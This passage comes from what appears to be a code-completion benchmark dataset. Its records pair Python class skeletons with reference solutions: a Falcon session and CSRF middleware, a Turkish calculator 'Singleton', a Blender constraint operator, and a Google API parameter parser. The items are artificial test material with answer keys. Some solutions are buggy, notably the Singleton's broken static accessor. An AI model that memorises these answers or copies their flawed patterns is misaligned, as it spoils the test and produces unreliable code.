get_node_and_children(node)\n return routes\n<|end_body_1|>\n\n<|body_start_2|>\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n<|end_body_2|>\n\n<|body_start_3|>\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n<|end_body_3|>\n\n<|body_start_4|>\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000401", "length_bytes": 4747, "license_type": "permissive", "methods": [{"docstring": "Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.", "name": "__init__", "signature": "def __init__(self, api, exempt_routes=list(), exempt_methods=list())"}, {"docstring": "Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.", "name": "_get_all_routes", "signature": "def _get_all_routes(self, api)"}, {"docstring": "Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. 
uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.", "name": "_get_settings", "signature": "def _get_settings(self, resource, uri_template)"}, {"docstring": "Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.", "name": "csrf_protect", "signature": "def csrf_protect(self, req)"}, {"docstring": "Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.", "name": "process_resource", "signature": "def process_resource(self, req, resp, resource, params)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001079", "prompt": "Implement the Python class `SessionMiddleware` described below.\n\nClass description:\nImplement the SessionMiddleware class.\n\nMethod signatures and docstrings:\n- def __init__(self, api, exempt_routes=list(), exempt_methods=list()): Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\n- def _get_all_routes(self, api): Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\n- def _get_settings(self, resource, uri_template): Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\n- def csrf_protect(self, req): Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\n- def process_resource(self, req, resp, resource, params): Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.", "prompted_full_text": "Implement the Python class `SessionMiddleware` described below.\n\nClass description:\nImplement the SessionMiddleware class.\n\nMethod signatures and docstrings:\n- def __init__(self, api, exempt_routes=list(), exempt_methods=list()): Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\n- def _get_all_routes(self, api): Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\n- def _get_settings(self, resource, uri_template): Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\n- def csrf_protect(self, req): Проверяет CSRF-токен всех POST-запросов. 
Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\n- def process_resource(self, req, resp, resource, params): Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\n\n<|skeleton|>\nclass SessionMiddleware:\n\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n <|body_0|>\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n <|body_1|>\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n <|body_2|>\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n <|body_3|>\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n<|end_body_0|>\n\n<|body_start_1|>\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n<|end_body_1|>\n\n<|body_start_2|>\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n<|end_body_2|>\n\n<|body_start_3|>\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n<|end_body_3|>\n\n<|body_start_4|>\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise 
falcon.HTTPUnauthorized\n self.csrf_protect(req)\n<|end_body_4|>\n", "revision_id": "37cdc4702dcacd0f187cca788e751e187fcd4499", "skeleton": "<|skeleton|>\nclass SessionMiddleware:\n\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n <|body_0|>\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n <|body_1|>\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n <|body_2|>\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n <|body_3|>\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SessionMiddleware:\n def __init__(self, api, exempt_routes=list(), exempt_methods=list()):\n \"\"\"Класс, содержащий сессионный middleware. Для настройки исключений используется проход по всем эндпоинтам и поиск настроек в аттрибутах классов, также можно передать эти параметры в аргументах конструктора. Аргументы: api(falcon.App, необходим): ссылка на экземпляр API. exempt_routes(list, опционально): список путей, не требущих аутентификации. exempt_methods(list, опционально): список методов, не требующих аутентификации.\"\"\"\n self.manager = SessionManager()\n self.config = dict()\n self.config['exempt_routes'] = exempt_routes\n self.config['exempt_methods'] = dict()\n self.config['exempt_methods']['global'] = exempt_methods\n routes = self._get_all_routes(api)\n for route in routes:\n self._get_settings(*route)\n\n def _get_all_routes(self, api):\n \"\"\"Ищет все пары вида (класс ресурса, шаблон URI) в API Аргументы: api(falcon.App, необходим): ссылка на экземпляр API.\"\"\"\n routes = []\n\n def get_node_and_children(node):\n routes.append((node.resource, node.uri_template))\n if len(node.children):\n for child_node in node.children:\n get_node_and_children(child_node)\n for node in api._router._roots:\n get_node_and_children(node)\n return routes\n\n def _get_settings(self, resource, uri_template):\n \"\"\"Собирает настройки из класса эндпоинта и добавляет их в глобальный конфиг. Аргументы: resource(необходим): ссылка на экземпляр класса эндпоинта. 
uri_template(string, необходим): строка, по которой производится маршрутизация к этому эндпоинту.\"\"\"\n local_conf = getattr(resource, 'auth', {})\n if local_conf.get('disabled'):\n self.config['exempt_routes'].append(uri_template)\n self.config['exempt_methods'][str(resource)] = local_conf.get('exempt_methods', [])\n\n def csrf_protect(self, req):\n \"\"\"Проверяет CSRF-токен всех POST-запросов. Выбрасывает исключение, если запрос не проходит проверку. Аргументы: req(необходим): текущий запрос.\"\"\"\n if req.method == 'POST':\n csrf = req.get_header('X-CSRF-Token')\n if csrf is None or csrf != req.context['user']['csrf_token']:\n req.context.logger.error('[ПОПЫТКА CSRF] uid %s, sid %s' % (req.context['user']['uid'], req.context['user']['sid']))\n raise falcon.HTTPUnauthorized(description='Неверный CSRF-токен')\n\n def process_resource(self, req, resp, resource, params):\n \"\"\"Автоматически вызывается Falcon при получении запроса. Аутентифицирует пользователя, проверяет CSRF-токен, а также добавляет в контекст запроса информацию о пользователе и его сессии.\"\"\"\n exempted = req.method in self.config['exempt_methods']['global'] or req.uri_template in self.config['exempt_routes'] or req.method in self.config['exempt_methods'][str(resource)]\n try:\n req.context['user'] = self.manager.authenticate(req.context.session, req.cookies)\n except BadAuthError:\n req.context['user'] = None\n if exempted:\n return\n else:\n raise falcon.HTTPUnauthorized\n self.csrf_protect(req)\n", "source": "the_stack_v2_python_sparse", "source_path": "cyberdas/middleware/session.py", "source_repo": "wild-trip/CyberDAS-API", "split": "test", "star_events_count": 0} {"blob_id": "7f549b8e87c02b1983d8640f731d6fe530f1a91c", "bodies": ["a = int(input('Birinci Sayı:'))\nb = int(input('İkinci Sayı:'))\nif Singleton.__instance == None:\n Singleton()\nreturn ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)", "if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\nelse:\n Singleton.__instance = self"], "bodies_text": "<|body_start_0|>\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n<|end_body_0|>\n\n<|body_start_1|>\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Singleton", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Singleton:\n\n def getInstance():\n \"\"\"Static access method.\"\"\"\n <|body_0|>\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n<|end_body_0|>\n\n<|body_start_1|>\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000402", "length_bytes": 768, "license_type": "no_license", "methods": [{"docstring": "Static access method.", "name": "getInstance", "signature": "def getInstance()"}, {"docstring": "Virtually private constructor.", "name": "__init__", "signature": "def __init__(self)"}], "n_methods": 2, "original_id": 
"stack_v2_sparse_classes_30k_train_005482", "prompt": "Implement the Python class `Singleton` described below.\n\nClass description:\nImplement the Singleton class.\n\nMethod signatures and docstrings:\n- def getInstance(): Static access method.\n- def __init__(self): Virtually private constructor.", "prompted_full_text": "Implement the Python class `Singleton` described below.\n\nClass description:\nImplement the Singleton class.\n\nMethod signatures and docstrings:\n- def getInstance(): Static access method.\n- def __init__(self): Virtually private constructor.\n\n<|skeleton|>\nclass Singleton:\n\n def getInstance():\n \"\"\"Static access method.\"\"\"\n <|body_0|>\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n<|end_body_0|>\n\n<|body_start_1|>\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n<|end_body_1|>\n", "revision_id": "259836447db6512c49df18fb847a6dd5ae0c308b", "skeleton": "<|skeleton|>\nclass Singleton:\n\n def getInstance():\n \"\"\"Static access method.\"\"\"\n <|body_0|>\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Singleton:\n def getInstance():\n \"\"\"Static access method.\"\"\"\n a = int(input('Birinci Sayı:'))\n b = int(input('İkinci Sayı:'))\n if Singleton.__instance == None:\n Singleton()\n return ('Toplam:', a + b, 'fark: ', a - b, 'Carpim: ', a * b, 'bolum: ', a / b)\n\n def __init__(self):\n \"\"\"Virtually private constructor.\"\"\"\n if Singleton.__instance != None:\n raise Exception('This class is a singleton!')\n else:\n Singleton.__instance = self\n", "source": "the_stack_v2_python_sparse", "source_path": "singletiondortislem.py", "source_repo": "komurkara/GoruntuIsleme", "split": "test", "star_events_count": 0} {"blob_id": "840e7b9ec9da1bfb6e1ea03702b21c13e531bb2e", "bodies": ["layout = self.layout\ncolumn = layout.column()\ncolumn.label(text=self.target + ':')\nif self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\nelif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])", "if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\nreturn {'FINISHED'}", "try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\nexcept:\n size = 350\ncontext.window_manager.invoke_popup(self, width=size)\nreturn {'RUNNING_MODAL'}"], "bodies_text": "<|body_start_0|>\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, 
bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n<|end_body_0|>\n\n<|body_start_1|>\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n<|end_body_2|>\n", "class_docstring": "This is operator is used to create the required pop-up panel.", "class_name": "constraint", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n <|body_1|>\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n<|end_body_0|>\n\n<|body_start_1|>\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000403", "length_bytes": 17024, "license_type": "no_license", "methods": [{"docstring": "Draw the constraint options.", "name": "draw", "signature": "def draw(self, context)"}, {"docstring": "Execute the operator.", "name": "execute", "signature": "def execute(self, context)"}, {"docstring": "Invoke the operator panel/menu, control its width.", "name": "invoke", "signature": "def invoke(self, context, event)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000857", "prompt": "Implement the Python class `constraint` described below.\n\nClass description:\nThis is operator is used to create the required pop-up panel.\n\nMethod signatures and docstrings:\n- def draw(self, context): Draw the constraint options.\n- def execute(self, context): Execute the operator.\n- def invoke(self, context, event): Invoke the operator panel/menu, control its width.", "prompted_full_text": "Implement the Python class `constraint` described below.\n\nClass description:\nThis is operator is used to create the required pop-up panel.\n\nMethod signatures and docstrings:\n- def draw(self, context): Draw the constraint options.\n- def execute(self, context): Execute the operator.\n- def invoke(self, context, event): Invoke the 
operator panel/menu, control its width.\n\n<|skeleton|>\nclass constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n <|body_1|>\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n<|end_body_0|>\n\n<|body_start_1|>\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n<|end_body_2|>\n", "revision_id": "7b796d30dfd22b7706a93e4419ed913d18d29a44", "skeleton": "<|skeleton|>\nclass constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n <|body_1|>\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class constraint:\n \"\"\"This is operator is used to create the required pop-up panel.\"\"\"\n\n def draw(self, context):\n \"\"\"Draw the constraint options.\"\"\"\n layout = self.layout\n column = layout.column()\n column.label(text=self.target + ':')\n if self.bone == '':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].constraints[self.target])\n elif context.mode == 'POSE':\n ConstraintButtons.main(ConstraintButtons, context, layout, bpy.data.objects[self.object].pose.bones[self.bone].constraints[self.target])\n\n def execute(self, context):\n \"\"\"Execute the operator.\"\"\"\n if self.properties:\n for area in context.screen.areas:\n if area.type in 'PROPERTIES':\n if self.bone == '':\n area.spaces.active.context = 'CONSTRAINT'\n elif context.mode == 'POSE':\n area.spaces.active.context = 'BONE_CONSTRAINT'\n else:\n area.spaces.active.context = 'CONSTRAINT'\n return {'FINISHED'}\n\n def invoke(self, context, event):\n \"\"\"Invoke the operator panel/menu, control its width.\"\"\"\n try:\n size = 350 if addon.preferences['largePopups'] == 0 else 525\n except:\n size = 350\n context.window_manager.invoke_popup(self, width=size)\n return {'RUNNING_MODAL'}\n", "source": "the_stack_v2_python_sparse", "source_path": "All_In_One/addons/name_panel/scripts/operator/icon.py", "source_repo": "2434325680/Learnbgame", "split": "test", "star_events_count": 0} {"blob_id": "d472f5576f911296750003c7773aa2cc14b39898", "bodies": ["self.argmap = 
{}\nself.required_params = []\nself.repeated_params = []\nself.pattern_params = {}\nself.query_params = []\nself.path_params = set()\nself.param_types = {}\nself.enum_params = {}\nself.set_parameters(method_desc)", "for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\nfor match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)"], "bodies_text": "<|body_start_0|>\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n<|end_body_0|>\n\n<|body_start_1|>\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n<|end_body_1|>\n", "class_docstring": "Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str", "class_name": "ResourceMethodParameters", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ResourceMethodParameters:\n \"\"\"Represents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). 
If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\"\"\"\n\n def __init__(self, method_desc):\n \"\"\"Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_0|>\n\n def set_parameters(self, method_desc):\n \"\"\"Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.argmap = {}\n self.required_params = []\n self.repeated_params = []\n self.pattern_params = {}\n self.query_params = []\n self.path_params = set()\n self.param_types = {}\n self.enum_params = {}\n self.set_parameters(method_desc)\n<|end_body_0|>\n\n<|body_start_1|>\n for arg, desc in six.iteritems(method_desc.get('parameters', {})):\n param = key2param(arg)\n self.argmap[param] = arg\n if desc.get('pattern'):\n self.pattern_params[param] = desc['pattern']\n if desc.get('enum'):\n self.enum_params[param] = desc['enum']\n if desc.get('required'):\n self.required_params.append(param)\n if desc.get('repeated'):\n self.repeated_params.append(param)\n if desc.get('location') == 'query':\n self.query_params.append(param)\n if desc.get('location') == 'path':\n self.path_params.add(param)\n self.param_types[param] = desc.get('type', 'string')\n for match in URITEMPLATE.finditer(method_desc['path']):\n for namematch in VARNAME.finditer(match.group(0)):\n name = key2param(namematch.group(0))\n self.path_params.add(name)\n if name in self.query_params:\n self.query_params.remove(name)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000404", "length_bytes": 42994, "license_type": "permissive", "methods": [{"docstring": "Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.", "name": "__init__", "signature": "def __init__(self, method_desc)"}, {"docstring": "Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.", "name": "set_parameters", "signature": "def set_parameters(self, method_desc)"}], "n_methods": 2, "prompt": "Implement the Python class `ResourceMethodParameters` described below.\n\nClass description:\nRepresents the parameters associated with a method. Attributes: argmap: Map from method parameter name (string) to query parameter name (string). required_params: List of required parameters (represented by parameter name as string). 
repeated_params: List of repeated parameters (represented by parameter name as string). pattern_params: Map from method parameter name (string) to regular expression (as a string). If the pattern is set for a parameter, the value for that parameter must match the regular expression. query_params: List of parameters (represented by parameter name as string) that will be used in the query string. path_params: Set of parameters (represented by parameter name as str\n\nMethod signatures and docstrings:\n- def __init__(self, method_desc): Constructor for ResourceMethodParameters. Sets default values and defers to set_parameters to populate. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.\n- def set_parameters(self, method_desc): Populates maps and lists based on method description. Iterates through each parameter for the method and parses the values from the parameter dictionary. Args: method_desc: Dictionary with metadata describing an API method. Value comes from the dictionary of methods stored in the 'methods' key in the deserialized discovery document.", 